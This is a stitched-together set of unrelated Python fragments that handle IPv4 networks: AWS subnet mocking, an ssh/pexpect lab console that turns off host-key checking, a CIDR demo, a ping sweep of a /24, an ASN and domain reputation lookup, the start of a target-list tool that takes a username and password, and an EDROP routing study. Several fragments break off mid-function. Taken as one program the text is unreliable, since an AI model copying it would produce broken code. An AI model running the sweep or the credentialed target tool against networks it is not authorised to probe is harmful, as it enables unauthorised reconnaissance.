                zone for zones in RegionsAndZonesBackend.zones.values()
                for zone in zones if zone.name == availability_zone)
        elif availability_zone_id:
            availability_zone_data = next(
                zone for zones in RegionsAndZonesBackend.zones.values()
                for zone in zones if zone.zone_id == availability_zone_id)
    except StopIteration:
        raise InvalidAvailabilityZoneError(
            availability_zone,
            ", ".join([
                zone.name for zones in RegionsAndZonesBackend.zones.values()
                for zone in zones
            ]),
        )
    subnet = Subnet(
        self,
        subnet_id,
        vpc_id,
        cidr_block,
        ipv6_cidr_block,
        availability_zone_data,
        default_for_az,
        map_public_ip_on_launch,
        assign_ipv6_address_on_creation=False,
    )

    for tag in tags or []:
        tag_key = tag.get("Key")
        tag_value = tag.get("Value")
        subnet.add_tag(tag_key, tag_value)

    # AWS associates a new subnet with the default Network ACL
    self.associate_default_network_acl_with_subnet(subnet_id, vpc_id)
    self.subnets[availability_zone][subnet_id] = subnet
    return subnet
def unformat_api_prefix_t(o):
    """Turn an API prefix (``.address`` + ``.address_length``) into an
    ip network object; returns None for an unrecognised address type.

    The networks are built non-strictly, so host bits in the address are
    masked rather than rejected.
    """
    addr = o.address
    if isinstance(addr, ipaddress.IPv4Address):
        return ipaddress.IPv4Network((addr, o.address_length), False)
    elif isinstance(addr, ipaddress.IPv6Address):
        return ipaddress.IPv6Network((addr, o.address_length), False)
def __init__(self, name, color, username, password, port, output=sys.stdout,
             reboot=False, location=None, pre_cmd_host=None, cmd=None,
             post_cmd_host=None, post_cmd=None, cleanup_cmd=None, env=None,
             lan_network=ipaddress.IPv4Network(u"192.168.1.0/24"),
             lan_gateway=ipaddress.IPv4Address(u"192.168.1.1"), config=[]):
    """Connect to (or spawn) a device console and prepare it for testing.

    When *name* is given, opens an ssh session to ``username@name:port``;
    otherwise spawns *cmd* locally via bash (optionally running
    *pre_cmd_host* first and registering *cleanup_cmd* for exit). Then
    handles the login dialogue, derives a non-conflicting WAN network from
    the LAN settings, applies 'options' overrides from *config*, and runs
    the optional post commands.

    NOTE(review): mutable default ``config=[]`` is shared across calls;
    ``env.iteritems()`` and ``str(...).decode('utf-8')`` are Python-2-only.
    NOTE(review): indentation of the pre_cmd_host/cleanup/bash-spawn
    section was reconstructed as part of the ``else`` (local-spawn)
    branch — confirm against the original file.
    """
    if name is not None:
        # Remote console over ssh; host-key checking disabled for lab gear.
        pexpect.spawn.__init__(self, command="ssh", args=[
            '%s@%s' % (username, name), '-p', port, '-o',
            'StrictHostKeyChecking=no', '-o',
            'UserKnownHostsFile=/dev/null'
        ])
        self.name = name
    else:
        name = None
        if pre_cmd_host is not None:
            sys.stdout.write("\tRunning pre_cmd_host.... ")
            sys.stdout.flush()
            phc = pexpect.spawn(command='bash',
                                args=['-c', pre_cmd_host],
                                env=env)
            phc.expect(pexpect.EOF, timeout=120)
            print("\tpre_cmd_host done")
        if cleanup_cmd is not None:
            self.cleanup_cmd = cleanup_cmd
            atexit.register(self.run_cleanup_cmd)
        # Local console: run the supplied command under bash.
        pexpect.spawn.__init__(self,
                               command="bash",
                               args=['-c', cmd],
                               env=env)
    self.color = color
    self.output = output
    self.username = username
    if username != "root":
        # Non-root shells end the prompt with '$' instead of '#'.
        self.prompt.append('%s\\@.*:.*$' % username)
    self.password = password
    self.port = port
    self.location = location
    self.env = env
    self.lan_network = lan_network
    self.lan_gateway = lan_gateway
    self.config = config

    # we need to pick a non-conflicting private network here
    # also we want it to be consistant and not random for a particular
    # board
    if (lan_gateway - lan_network.num_addresses).is_private:
        self.gw = lan_gateway - lan_network.num_addresses
    else:
        self.gw = lan_gateway + lan_network.num_addresses

    self.nw = ipaddress.IPv4Network(
        str(self.gw).decode('utf-8') + '/' + str(lan_network.netmask),
        strict=False)

    # override above values if set in wan options
    if 'options' in self.config:
        options = [x.strip() for x in self.config['options'].split(',')]
        for opt in options:
            if opt.startswith('wan-static-ip:'):
                self.gw = opt.replace('wan-static-ip:', '')
            if opt.startswith('wan-static-route:'):
                # "a.b.c.d/x-gw" becomes "a.b.c.d/x via gw" for `ip route`.
                self.static_route = opt.replace('wan-static-route:',
                                                '').replace('-', ' via ')
            if opt.startswith('wan-dhcp-client'):
                self.wan_dhcp = True
            if opt.startswith('wan-cmts-provisioner'):
                self.wan_cmts_provisioner = True
            if opt.startswith('wan-no-eth0'):
                self.wan_no_eth0 = True

    # Walk the login dialogue: host-key prompt, password prompt, or an
    # immediate shell prompt.
    try:
        i = self.expect(["yes/no", "assword:", "Last login"] + self.prompt,
                        timeout=30)
    except pexpect.TIMEOUT as e:
        raise Exception("Unable to connect to %s." % name)
    except pexpect.EOF as e:
        if hasattr(self, "before"):
            print(self.before)
        raise Exception("Unable to connect to %s." % name)
    if i == 0:
        # Accept the new host key, then expect login banner or password.
        self.sendline("yes")
        i = self.expect(["Last login", "assword:"])
    if i == 1:
        self.sendline(password)
    else:
        pass
    # if we did initially get a prompt wait for one here
    if i < 3:
        self.expect(self.prompt)

    if name is None:
        # Local spawn: learn the device's name from `hostname`.
        self.sendline('hostname')
        self.expect('hostname')
        self.expect(self.prompt)
        name = self.name = self.before.strip()

    if self.port != 22:
        cprint("%s port %s device console = %s" %
               (name, port, colored(color, color)),
               None,
               attrs=['bold'])
    else:
        cprint("%s device console = %s" % (name, colored(color, color)),
               None,
               attrs=['bold'])

    if post_cmd_host is not None:
        sys.stdout.write("\tRunning post_cmd_host.... ")
        sys.stdout.flush()
        phc = pexpect.spawn(command='bash',
                            args=['-c', post_cmd_host],
                            env=env)
        i = phc.expect([pexpect.EOF, pexpect.TIMEOUT, 'password'])
        if i > 0:
            print("\tpost_cmd_host did not complete, it likely failed\n")
        else:
            print("\tpost_cmd_host done")

    if post_cmd is not None:
        # Export the environment on the device before running post_cmd.
        env_prefix = ""
        for k, v in env.iteritems():
            env_prefix += "export %s=%s; " % (k, v)
        self.sendline(env_prefix + post_cmd)
        self.expect(self.prompt)

    if reboot:
        self.reset()

    self.logfile_read = output
"""Small demo: expand a CIDR string and print its size and address range."""
import ipaddress

print("hello")

cidrSig = '172.10.242.81/12'
# Parse non-strictly (second arg False) so the host bits in .242.81 are
# simply masked off instead of raising ValueError.
rangeAddr = ipaddress.IPv4Network(cidrSig, False)
# Number of addresses = 2 ** (32 - prefix length).
leadindBits = int(cidrSig.split("/")[1])
addressCount = 2 ** (32 - leadindBits)
print(addressCount)
print(str(rangeAddr[0]))
print(rangeAddr[-1])
#!/bin/python3 import os import ipaddress total = -1 online = 0 listaIPs = [] for host in ipaddress.IPv4Network('192.168.10.0/24'): resposta = os.system("ping -c 1 " + str(host) + " > /dev/null 2>&1") if resposta == 0: print(str(host) + " está online") online = online + 1 total = total + 1 else: print(str(host) + " está offline") total = total + 1 if total < 51: listaIPs.append(str(host)) print(listaIPs)
# NOTE(review): fragment — the indented section below is the tail of a
# function (it references `response` and `bad_asn` bound earlier, and is
# later called as `umbrella_investigate`); `get_as`, `get_prefixes_per_asn`
# and `headers` are defined elsewhere in the file.
    print ('''
    Per the Umbrella Investigate API, the status will be one of the following
    "-1" if the domain is believed to be malicious,
    "1" if the domain is believed to be benign,
    "0" if it hasn't been classified yet
    ''')
    # Strip the leading "https://" (8 chars) from the website field.
    response_body = response.json()["data"]["website"][8:]
    print (f'ASN {bad_asn} appears to be associated with {response_body}')
    response = requests.get('https://investigate.api.umbrella.com/domains/score/' + response_body, headers=headers)
    reply_body = response.json()[response_body]
    print (f'{response_body} shows a Score of ' + reply_body)

# Prompt until the user supplies a valid, globally-routable IPv4 subnet
# no more specific than /24.
while True:
    try:
        bad_subnet = input ('Please enter the offending IPv4 subnet: ')
        verifyip = ipaddress.IPv4Network(bad_subnet)
        if verifyip.prefixlen <= 24 and verifyip.is_global:
            break
    except Exception as e:
        print(e)

bad_asn = get_as(bad_subnet)
print ()
print (f'The ASN this subnet originates is found to be: {bad_asn}')
all_the_prefixes = get_prefixes_per_asn(str(bad_asn))
print ()
print ('The other IPv4 prefixes associated with this ASN are:')
print (*all_the_prefixes, sep = '\n')
print ()
further_investigation = input('Do you want to use Umbrella Investigate API to try and find the Domain status? ')
if further_investigation.lower() == 'y':
    umbrella_investigate(str(bad_asn), headers)
# NOTE(review): fragment — the final `except:` body is cut off past this chunk.
if __name__ == '__main__':
    # Parameters check
    if len(sys.argv) < 2 or len(sys.argv) > 4:
        print("{} <ip|subnet|filename> [username] [password]".format(
            sys.argv[0]))
        sys.exit(1)
    if len(sys.argv) > 2:
        USERNAME = sys.argv[2]
    if len(sys.argv) > 3:
        PASSWORD = sys.argv[3]
    ok = False
    targets = sys.argv[1]
    tgtlist = []
    # First interpretation: the argument is itself an IP or subnet.
    # NOTE(review): `unicode` is Python-2-only; the bare `except` hides the
    # NameError this would raise on py3 and silently falls through to the
    # file branch below.
    try:
        netw = ipaddress.IPv4Network(unicode(targets))
        for ip in netw:
            tgtlist.append(ip)
        ok = True
    except:
        pass
    if not ok:
        # Second interpretation: the argument is a file with one network
        # per line.  NOTE(review): file handle is never closed.
        try:
            netlist = open(targets, 'r').read().splitlines()
            for net in netlist:
                net = net.replace("\n", "").replace("\r", "")
                netw = ipaddress.IPv4Network(unicode(net))
                for ip in netw:
                    tgtlist.append(ip)
            ok = True
        except:
def main():
    """Measure how many EDROP-listed prefixes are (partially) unroutable
    per day between 2019-06-05 and 2020-02-26.

    For each day a routing tree is built (``buildTree``) and, for every
    not-yet-seen prefix from the pickled EDROP list, 100 random addresses
    are sampled; prefixes with at least one unroutable sample are recorded
    per day, and the delay between EDROP listing and first observed block
    is accumulated.  Results are pickled and summary counters printed.

    NOTE(review): ``unicode(x, "utf-8")`` is Python-2-only; on py3 this
    raises NameError.  ``avg_day`` divides by ``diff_amount`` and would
    raise ZeroDivisionError if no prefix ever matched — confirm inputs.
    Relies on ``daterange`` and ``buildTree`` defined elsewhere.
    """
    start_date = date(2019,6,5)
    end_date = date(2020,2,26)
    edrop_route = {}          # date string -> list of newly-blocked prefixes
    edrop_counter = 0         # total prefixes ever observed blocked
    weird_counter = 0         # prefixes only *partially* unroutable (<100 hits)
    diff_time = 0             # summed seconds between listing and blocking
    diff_amount = 0
    diff_weird_counter = 0    # blocked before appearing on the list
    occurred = set()          # prefixes already recorded, processed once
    with open("edroplist_data.pickle", "rb") as f:
        edrop_data = pickle.load(f)
    # Keep only CIDR entries (third-from-last char '/'), first half only.
    ip_list = [x for x in edrop_data if x[-3] == '/']
    ip_list = ip_list[:len(ip_list)//2]
    for p_date in daterange(start_date,end_date):
        day = p_date.strftime('%d')
        month = p_date.strftime('%m')
        year = p_date.strftime('%Y')
        date_str = p_date.strftime('%Y-%m-%d')
        try:
            tree = buildTree(year,month,day)
        except OSError as e:
            print(e)
            print('failed to access date %s'%date_str)
            print('Make sure the date is valid')
            continue
        print(date_str)
        for x in ip_list:
            counter = 0
            if x not in occurred:
                # Sample 100 random addresses from the prefix and count how
                # many are not routable on this day.
                for u_ip in random.sample(list(ipaddress.IPv4Network(unicode(x, "utf-8"))),100):
                    ip = str(u_ip)
                    if not tree.check_prefix_is_routable(ip):
                        counter += 1
                if counter != 0:
                    if date_str not in edrop_route:
                        edrop_route[date_str] = [x]
                        occurred.add(x)
                        edrop_counter += 1
                    else:
                        edrop_route[date_str].append(x)
                        occurred.add(x)
                        edrop_counter += 1
                    date_added = datetime.strptime(edrop_data[x][0],"%Y-%m-%d").date()
                    diff = p_date - date_added
                    if p_date < date_added:
                        # blocked before it is added to bllack list
                        diff_weird_counter += 1
                    else:
                        diff_time += diff.total_seconds()
                        diff_amount +=1
                if counter != 100:
                    weird_counter += 1
    f1 = open( "edroproute_1.pickle", "wb" )
    pickle.dump( edrop_route, f1)
    f1.close()
    avg_day = diff_time/86400/diff_amount
    print("edrop_part1")
    print("edrop_counter: " + str(edrop_counter))
    print(edrop_route)
    print("weird_counter " + str(weird_counter))
    print("avg_hour " + str(avg_day))
    print("diff_weird_counter " + str(diff_weird_counter))